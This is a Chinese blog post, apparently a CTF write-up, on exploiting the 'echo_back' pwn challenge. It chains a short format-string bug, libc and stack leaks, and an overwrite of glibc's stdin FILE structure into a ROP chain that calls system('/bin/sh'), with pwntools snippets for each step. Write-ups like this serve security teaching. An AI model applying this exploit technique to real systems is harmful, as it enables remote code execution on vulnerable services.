【IO系列IO_2_1_stdin】echo_back

已于 2024-05-10 09:19:50 修改
阅读量1.8k 收藏 37
点赞数 35
分类专栏: Pwn刷题之路 文章标签: 网络安全 安全
于 2024-05-06 23:24:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbudong/article/details/138468752
版权

一、题目描述

名称:echo_back

类别:Pwn

知识点:格式化字符串漏洞 + IO_FILE利用

难度系数:简单

赛题链接:BUUCTF在线评测

二、题目分析

1.检查保护

保护全开:

8d12bb9a2cc741ad86db15a77977a5d4.png

2.漏洞分析

①先扔到IDA中查看,共有3个功能,分别查看一下每个功能的实现。

53ad9743fae741efa395cc66c8c78974.png

②第一个set name只有一个read写7个字节,没有溢出;再看第二个功能echo_back,发现下边的printf存在格式化字符串漏洞,但同样存在7字节限制,用%num%p可以泄露栈上__libc_start_call_main的libc地址,但无法直接用fmt构造rop链和覆写got地址(full relro)

7ec1b3864f2e4c08a28d12cc6da495ec.png

253cbc4e7f3c40138af02fc41ccbc1b9.png

③进一步想想,操作系统如何知道用户输入了几个字节呢?如果有一个地方记录着用户输入字节数或已读取字节数,是不是可以尝试修改这个记录的数据来突破7字节输入限制呢?答案是有的,在linux系统中万物皆是文件,当前的输入也是如此,都会有一个对应的IO_FILE来记录读取的起始、当前和结束地址,当然还有很多其他字段,相关文章很多,这里不再赘述(可通过ctfwiki或IO_FILE相关博客学习)。IO_FILE结构体源码如下:

struct _IO_FILE {
  int _flags;        /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;    /* Current read pointer */
  char* _IO_read_end;    /* End of get area. */
  char* _IO_read_base;    /* Start of putback+get area. */
  char* _IO_write_base;    /* Start of put area. */
  char* _IO_write_ptr;    /* Current put pointer. */
  char* _IO_write_end;    /* End of put area. */
  char* _IO_buf_base;    /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
#if defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001
  _IO_off64_t _offset;
# if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
# else
  void *__pad1;
  void *__pad2;
  void *__pad3;
  void *__pad4;
# endif
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
#endif
};

④同时我们得知,stdin、stdout和stderr其实也都有对应的IO_FILE,他们三个只是指针,用来指向对应的IO_FILE,其中stdin负责输入,且scanf就是从stdin中读取数据,所以我们主要攻击IO_2_1_stdin的结构体。这里给出scanf中的关键实现函数源码_IO_new_file_underflow

int
_IO_new_file_underflow (fp)
     _IO_FILE *fp;
{
  _IO_ssize_t count;
#if 0
  /* SysV does not make this test; take it out for compatibility */
  if (fp->_flags & _IO_EOF_SEEN)
    return (EOF);
#endif

  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
//**************************************************************************
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;
//**************************************************************************
  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
	{
	  free (fp->_IO_save_base);
	  fp->_flags &= ~_IO_IN_BACKUP;
	}
      INTUSE(_IO_doallocbuf) (fp);
    }

  /* Flush all line buffered files before reading. */
  /* FIXME This can/should be moved to genops ?? */
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
#if 0
      INTUSE(_IO_flush_all_linebuffered) ();
#else
      /* We used to flush all line-buffered stream.  This really isn't
	 required by any standard.  My recollection is that
	 traditional Unix systems did this for stdout.  stderr better
	 not be line buffered.  So we do just that here
	 explicitly.  --drepper */
      _IO_cleanup_region_start ((void (*) __P ((void *))) _IO_funlockfile,
				_IO_stdout);
      _IO_flockfile (_IO_stdout);

      if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
	  == (_IO_LINKED | _IO_LINE_BUF))
	_IO_OVERFLOW (_IO_stdout, EOF);

      _IO_funlockfile (_IO_stdout);
      _IO_cleanup_region_end (0);
#endif
    }

  INTUSE(_IO_switch_to_get_mode) (fp);

  /* This is very tricky. We have to adjust those
     pointers before we call _IO_SYSREAD () since
     we may longjump () out while waiting for
     input. Those pointers may be screwed up. H.J. */
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;
///
  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);
///
  if (count <= 0)
    {
      if (count == 0)
	fp->_flags |= _IO_EOF_SEEN;
      else
	fp->_flags |= _IO_ERR_SEEN, count = 0;
  }
  fp->_IO_read_end += count;
  if (count == 0)
    return EOF;
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}

⑤比较关键的代码我通过来包裹起来了,这里使用_IO_SYSREAD函数向_IO_buf_base写入了_IO_buf_end - _IO_buf_base大小的数据,base是起始地址,end是结束地址。如果能够控制_IO_buf_base和_IO_buf_end那就可以向任意地址写入任意数据了。这里做个标注:

_IO_buf_base:输入缓冲区的起始地址。

_IO_read_ptr:输入缓冲区的当前读取地址。

_IO_read_end:输入缓冲区的结束位置。

⑥为了修改_IO_buf_base,我们要将_IO_buf_base指向的地址改到_IO_buf_base之前的地址。这里解释一下为什么要改到_IO_buf_base之前的地址,因为我们通过printf格式化字符串修改地址时,会使用%num$hhn,正好7个字符,所以只能将_IO_buf_base内存储地址的最后一个字节修改为\x00。

⑦当我们通过格式化字符串漏洞泄露libc地址后,我们可以通过libc_base + libc中_IO_2_1_stdin_地址来得到真实stdin地址,同理算出system和binsh的地址备用。这里的_IO_buf_base在stdin的第7个位置,所以相对于stdin的偏移就是0x8 * 7。

f152f486b80a4f09b1d0c33a94b04f60.png

片段脚本如下:

echo_back("%19$p")
p.recvuntil("0x")
recv1 = p.recvuntil(b'exit\n')
__libc_start_main = int(recv1[0:12].decode(), 16) - 240 #远程是240
libc_base = __libc_start_main - libc.symbols['__libc_start_main']

system = libc_base + libc.symbols['system']    
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
   
_IO_2_1_stdin_ = libc_base + libc.symbols['_IO_2_1_stdin_']
_IO_buf_base = _IO_2_1_stdin_ + 0x8 * 7

⑧除此之外,我们还需要泄露main函数的返回地址的地址,因为我们是每次新调用echo_back时开辟的栈地址会不一样,所以我们需要使用稳定的main函数栈地址来做rop。当我们调用echo_back时,它的rbp中存的是main函数的rbp地址,通过这个地址+8就得到了main函数存返回地址的地址;echo_back返回地址存的就是返回main函数所在的地址,也就是main函数中调用echo_back后要执行的地址,通过相对偏移可以算出main函数地址。如下图所示:

e343d27ddca04ea0b3559f200a1df101.png

462f93f226ff49e48c98c8d80f398fef.png

片段脚本:

echo_back("%13$p")    
p.recvuntil("0x")
recv2 = p.recvuntil(b'exit\n')
main_addr = int(recv2[0:12].decode(), 16)  - (0x0D08 - 0x0C6C)
elf_base = main_addr - 0x0C6C    
pop_rdi_addr = elf_base + pop_rdi    
 
echo_back("%12$p")    
p.recvuntil("0x")
recv3 = p.recvuntil(b'exit\n')
main_rbp = int(recv3[0:12].decode(), 16)
main_ret = main_rbp + 0x8

⑨那如何改写_IO_buf_base呢?这就要用到set_name函数了,通过set_name函数,我们将s的内容修改成_IO_buf_base的地址,接着用echo_back函数中的格式化字符串漏洞就能成功将_IO_buf_base的低两位写成0。

set_name(p64(_IO_buf_base))
echo_back('%16$hhn')

接下来我们通过scanf修改stdin的IO_FILE结构体,其中前三个0x83 + _IO_2_1_stdin_是通过调试发现没有变化的,直接原值覆盖,后边接上我们想覆盖的起始地址和结束地址。

值得一提的是,这里有个getchar()会自动帮我们给_IO_read_ptr加一。

26754c2a1781444da7f893d129478fc5.png

payload = p64(0x83 + _IO_2_1_stdin_ ) * 3 + p64(main_ret) + p64(main_ret + 0x18)
p.sendlineafter('choice>>','2')
p.sendafter('length:',payload)
p.sendline('')
for i in range(0, len(payload) - 1):
    p.sendlineafter('choice>>',"2")
    p.sendlineafter('length:',"7")

⑩最后一个简单的ROP,结束战斗

sleep(1)
p.sendlineafter(b'choice>>',"2")
payload = p64(pop_rdi_addr) + p64(bin_sh) + p64(system)
p.sendafter(b'length:',payload)
p.sendline("7")
p.sendlineafter(b'choice>>',"3")
p.interactive()

三、EXP

EXP在上边已经分段展示了,自己做一遍会更好,加油。

QY不懂
关注
专栏目录
echo_back(xctf)
weixin_43868725的博客
08-16 736
0x0 程序保护和流程 保护: 流程: main() echo_back() 存在一个格式化字符串漏洞。 0x1 利用过程 1.题目保护全开,程序中又没有可用的字符串,函数。所以只能通过格式化字符串漏洞泄露地址,写入有限数据。 2.既然有格式化字符串漏洞,肯定是要泄露栈上的信息。但是由于限制了字符串最长为7,所以只能逐位泄露。 选择使用ida的远程调试,因为可以丢弃alarm()发出的signal。选择在echo_back()的retn处下断点 直到到输入%6$p时在栈上发现了被输出的数据(为什么是
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 837
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
PWN技巧之攻防世界echo_back
aptx4869_li的博客
02-20 633
PWN技巧之攻防世界echo_back
【攻防世界】echo_back
weixin_43960998的博客
04-05 428
1.程序逆向 程序读起来很简单,提供了两个功能,设置姓名和可以一直循环进行 echo_back,在 echo_back 中存在一个格式化字符串漏洞,但是每次最多读取 7 字节: 首先想到是写返回地址,但是最多只写 7 字节导致不能输送完整的 rop ,所以这里需要学习一个新的知识点。 2.漏洞利用&知识点 一个可以循环利用的格式化字符串,但是有字符限制 程序通过 scanf 输入 先是通过栈上的一些数据来泄漏 libc_base,elf_base,还要泄漏存放 main 的返回地址的栈地址,这
攻防世界PWN之echo_back题解
seaaseesa的博客
11-17 2629
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
攻防世界(pwn)echo_back + magic (_IO_FILE文件流攻击初探)
PLpa的博客
03-14 1387
前言: 这两题都是关于_IO_FILE文件流攻击的题目,如果对_IO_FILE文件流不是很清楚,可以看ctfwiki中的_IO_FILE介绍——传送门。 echo_back——关于_IO_2_1_stdin结构的利用 文件保护全开,不能got覆写。 进入IDA,发现程序有两个功能,一个是setname,一个是echo back。 查看setname功能,发现此功能只能输入7个字节,不具备RO...
[XCTF-pwn] 24_ciscn-2018-Quals-echo_back
weixin_52640415的博客
03-08 278
格式化字符串漏洞,输入长度受限,劫持_IO_2_1_stdin_读入payload unsigned __int64 __fastcall echo_back(const char *a1) { size_t nbytes; // [rsp+1Ch] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+28h] [rbp-8h] v3 = __readfsqword(0x28u); memset((char *)&nbytes + 4, 0
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 479
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
IO_FILE Exploitation
azraelxuemo的博客
04-11 1302
文章目录简介IO_FILE结构_IO_FILEIO_jump_t图示利用原理exit函数vtable checkexit函数的广泛性exit函数exit调用__run_exit_handlersRUN_HOOK__run_exit_handlers调用_IO_cleanup_IO_cleanup调用_IO_unbuffer_all例题hctf2018_the_end题目分析伪造vtable修改vtable地址为我们伪造的区域attackdlfini 简介 IO_FILE Exploitation也是ctf里
2020-11-09学习记录:攻防世界pwn之echo_back
eeeeeight的博客
11-09 280
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8492
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全概述:从认知到实践
l1x1n0的博客
10-04 935
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 946
信息安全工程师——机房安全分析与防护篇
微服务架构:核心组件解析与设计思考(服务发现、API网关、 配置中心、负载均衡、服务调用、服务熔断、链路追踪、消息队列、服务安全、分布式事务)
项目git同名HuYaochao,未入职
10-06 1108
(服务发现、API网关、 配置中心、负载均衡、服务调用、服务熔断、链路追踪、消息队列、服务安全、分布式事务)
MySQL 安全
学习,分享一直在路上
10-06 1003
MySQL安全实践
叉车毫米波雷达防撞技术,保护叉车作业安全
jiuxin666的博客
10-09 309
叉车毫米波防撞系统利用毫米波雷达技术实时监测环境,预警并紧急制动防碰撞,适用于狭窄通道,保护驾驶员及财产安全,实现叉车作业安全高效。
【Parsec】一款安全高效的远程桌面软件
最新发布
A-Itfuture的博客
10-09 364
Parsec 是一款远程桌面软件,它允许用户通过P2P(点对点)技术远程访问和控制另一台计算机。
extern struct _IO_FILE *stdin;
07-12
`extern struct _IO_FILE *stdin;` 是一个外部变量声明,用于声明名为 `stdin` 的全局变量。 在C语言中,`stdin` 是一个预定义的标准输入流,用于从标准输入设备(通常是键盘)读取输入数据。它是一个指向 `_IO_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值